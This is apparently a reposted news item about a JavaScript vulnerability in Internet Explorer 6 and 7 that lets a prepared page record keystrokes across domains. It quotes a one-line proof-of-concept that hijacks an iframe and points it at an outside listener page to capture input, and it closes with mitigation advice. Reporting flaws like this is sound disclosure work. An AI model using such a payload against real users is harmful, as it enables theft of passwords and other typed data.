Internet Explorer 6 & 7 critical Javascript exploit

Ghacks has found a critical Javascript vulnerability that effects Internet Explorer 6&7, that can be used to record keystrokes of a user even if he is switching domains. That means that a specifically prepared website can launch some Javascript that records everything the user does afterwards including text input which naturally means usernames and passwords […]

Ghacks has found a critical Javascript vulnerability that effects Internet Explorer 6&7, that can be used to record keystrokes of a user even if he is switching domains. That means that a specifically prepared website can launch some Javascript that records everything the user does afterwards including text input which naturally means usernames and passwords as well.

The following Javascript code, when clicked will open a new window (hackademix.net), it will hijack one of the iframes, and capture keystrokes.

javascript:x=open('http://hackademix.net/');setInterval(function(){try{x.frames[0].location={toString:function(){return%20'http://www.sirdarckcat.net/caballero-listener.html';}}}catch(e){}},5000);void(1);

There is no fix for this vulnerability at this moment, if you’re using IE 6, IE7, all you can do is disable Javascript or allow it only on trusted domains. There is an explanation from the same researcher available.

Source:→ Ghacks